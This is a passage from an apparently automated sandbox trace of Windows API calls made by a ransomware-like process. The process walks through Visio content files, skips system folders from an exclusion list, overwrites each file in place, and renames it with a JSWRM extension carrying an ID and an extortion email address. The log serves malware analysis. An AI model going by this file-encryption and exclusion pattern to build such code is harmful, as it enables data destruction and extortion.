[0147.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNET_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNET_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNET_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnet_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.605] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=195308) returned 1 [0147.605] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.606] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0147.620] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.620] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0147.621] CloseHandle (hObject=0x314) returned 1 [0147.621] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNET_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnet_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNET_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnet_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.622] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a459ce, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a459ce, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a459ce, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xbd16, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DTLNET_M.VSTX", cAlternateFileName="DTLNET~2.VST")) returned 1 [0147.622] lstrcmpiW (lpString1="DTLNET_M.VSTX", lpString2=".") returned 1 [0147.622] lstrcmpiW (lpString1="DTLNET_M.VSTX", lpString2="..") returned 1 [0147.622] lstrcmpiW (lpString1="DTLNET_M.VSTX", lpString2="...") returned 1 [0147.622] lstrcmpiW (lpString1="DTLNET_M.VSTX", lpString2="windows") returned -1 [0147.623] lstrcmpiW (lpString1="DTLNET_M.VSTX", lpString2="recovery") returned -1 [0147.623] lstrcmpiW (lpString1="DTLNET_M.VSTX", lpString2="perflogs") returned -1 [0147.623] lstrcmpiW (lpString1="DTLNET_M.VSTX", lpString2="documents and settings") returned 1 [0147.623] lstrcmpiW (lpString1="DTLNET_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.623] lstrcmpiW (lpString1="DTLNET_M.VSTX", lpString2="system volume information") returned -1 [0147.623] lstrcmpiW (lpString1="DTLNET_M.VSTX", lpString2="msocache") returned -1 [0147.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNET_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNET_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNET_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnet_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.624] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=48406) returned 1 [0147.624] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.624] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xbd10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xbd10, lpOverlapped=0x0) returned 1 [0147.629] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.629] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xbd10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xbd10, lpOverlapped=0x0) returned 1 [0147.630] CloseHandle (hObject=0x314) returned 1 [0147.631] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNET_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnet_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNET_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnet_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.632] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1fa7818, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1fa7818, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1fa7818, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2d656, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DTLNET_U.VSSX", cAlternateFileName="DTLNET~2.VSS")) returned 1 [0147.632] lstrcmpiW (lpString1="DTLNET_U.VSSX", lpString2=".") returned 1 [0147.632] lstrcmpiW (lpString1="DTLNET_U.VSSX", lpString2="..") returned 1 [0147.632] lstrcmpiW (lpString1="DTLNET_U.VSSX", lpString2="...") returned 1 [0147.632] lstrcmpiW (lpString1="DTLNET_U.VSSX", lpString2="windows") returned -1 [0147.632] lstrcmpiW (lpString1="DTLNET_U.VSSX", lpString2="recovery") returned -1 [0147.632] lstrcmpiW (lpString1="DTLNET_U.VSSX", lpString2="perflogs") returned -1 [0147.632] lstrcmpiW (lpString1="DTLNET_U.VSSX", lpString2="documents and settings") returned 1 [0147.633] lstrcmpiW (lpString1="DTLNET_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.633] lstrcmpiW (lpString1="DTLNET_U.VSSX", lpString2="system volume information") returned -1 [0147.633] lstrcmpiW (lpString1="DTLNET_U.VSSX", lpString2="msocache") returned -1 [0147.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNET_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNET_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNET_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnet_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.634] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=185942) returned 1 [0147.634] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.635] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0147.647] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.647] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0147.648] CloseHandle (hObject=0x314) returned 1 [0147.648] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNET_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnet_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNET_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnet_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.649] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a459ce, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a459ce, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a459ce, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xbe37, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DTLNET_U.VSTX", cAlternateFileName="DTLNET~1.VST")) returned 1 [0147.649] lstrcmpiW (lpString1="DTLNET_U.VSTX", lpString2=".") returned 1 [0147.649] lstrcmpiW (lpString1="DTLNET_U.VSTX", lpString2="..") returned 1 [0147.649] lstrcmpiW (lpString1="DTLNET_U.VSTX", lpString2="...") returned 1 [0147.649] lstrcmpiW (lpString1="DTLNET_U.VSTX", lpString2="windows") returned -1 [0147.649] lstrcmpiW (lpString1="DTLNET_U.VSTX", lpString2="recovery") returned -1 [0147.649] lstrcmpiW (lpString1="DTLNET_U.VSTX", lpString2="perflogs") returned -1 [0147.650] lstrcmpiW (lpString1="DTLNET_U.VSTX", lpString2="documents and settings") returned 1 [0147.650] lstrcmpiW (lpString1="DTLNET_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.650] lstrcmpiW (lpString1="DTLNET_U.VSTX", lpString2="system volume information") returned -1 [0147.650] lstrcmpiW (lpString1="DTLNET_U.VSTX", lpString2="msocache") returned -1 [0147.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNET_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNET_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNET_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnet_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.651] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=48695) returned 1 [0147.651] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.651] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xbe30, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xbe30, lpOverlapped=0x0) returned 1 [0147.656] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.657] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xbe30, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xbe30, lpOverlapped=0x0) returned 1 [0147.658] CloseHandle (hObject=0x314) returned 1 [0147.658] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNET_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnet_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNET_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnet_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.659] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1ba18c4, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1ba18c4, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1bc7b4a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x168f5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DTLNME_M.VSSX", cAlternateFileName="DTLNME~2.VSS")) returned 1 [0147.659] lstrcmpiW (lpString1="DTLNME_M.VSSX", lpString2=".") returned 1 [0147.659] lstrcmpiW (lpString1="DTLNME_M.VSSX", lpString2="..") returned 1 [0147.659] lstrcmpiW (lpString1="DTLNME_M.VSSX", lpString2="...") returned 1 [0147.659] lstrcmpiW (lpString1="DTLNME_M.VSSX", lpString2="windows") returned -1 [0147.659] lstrcmpiW (lpString1="DTLNME_M.VSSX", lpString2="recovery") returned -1 [0147.659] lstrcmpiW (lpString1="DTLNME_M.VSSX", lpString2="perflogs") returned -1 [0147.659] lstrcmpiW (lpString1="DTLNME_M.VSSX", lpString2="documents and settings") returned 1 [0147.659] lstrcmpiW (lpString1="DTLNME_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.659] lstrcmpiW (lpString1="DTLNME_M.VSSX", lpString2="system volume information") returned -1 [0147.659] lstrcmpiW (lpString1="DTLNME_M.VSSX", lpString2="msocache") returned -1 [0147.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNME_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNME_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNME_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnme_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.660] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=92405) returned 1 [0147.660] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.661] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x168f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x168f0, lpOverlapped=0x0) returned 1 [0147.668] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.668] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x168f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x168f0, lpOverlapped=0x0) returned 1 [0147.669] CloseHandle (hObject=0x314) returned 1 [0147.669] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNME_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnme_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DTLNME_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dtlnme_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.670] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a1f7cc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a1f7cc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a1f7cc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x5c02, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DTLNME_M.VSTX", cAlternateFileName="DTLNME~1.VST")) returned 1 [0147.670] lstrcmpiW (lpString1="DTLNME_M.VSTX", lpString2=".") returned 1 [0147.670] lstrcmpiW (lpString1="DTLNME_M.VSTX", lpString2="..") returned 1 [0147.670] lstrcmpiW (lpString1="DTLNME_M.VSTX", lpString2="...") returned 1 [0147.670] lstrcmpiW (lpString1="DTLNME_M.VSTX", lpString2="windows") returned -1 [0147.671] lstrcmpiW (lpString1="DTLNME_M.VSTX", lpString2="recovery") returned -1 [0147.671] lstrcmpiW (lpString1="DTLNME_M.VSTX", lpString2="perflogs") returned -1 [0147.671] lstrcmpiW (lpString1="DTLNME_M.VSTX", lpString2="documents and settings") returned 1 [0147.671] lstrcmpiW (lpString1="DTLNME_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.671] lstrcmpiW (lpString1="DTLNME_M.VSTX", lpString2="system volume information") returned -1 [0147.671] lstrcmpiW (lpString1="DTLNME_M.VSTX", lpString2="msocache") returned -1 [0147.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNME_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNME_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DTLNME_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 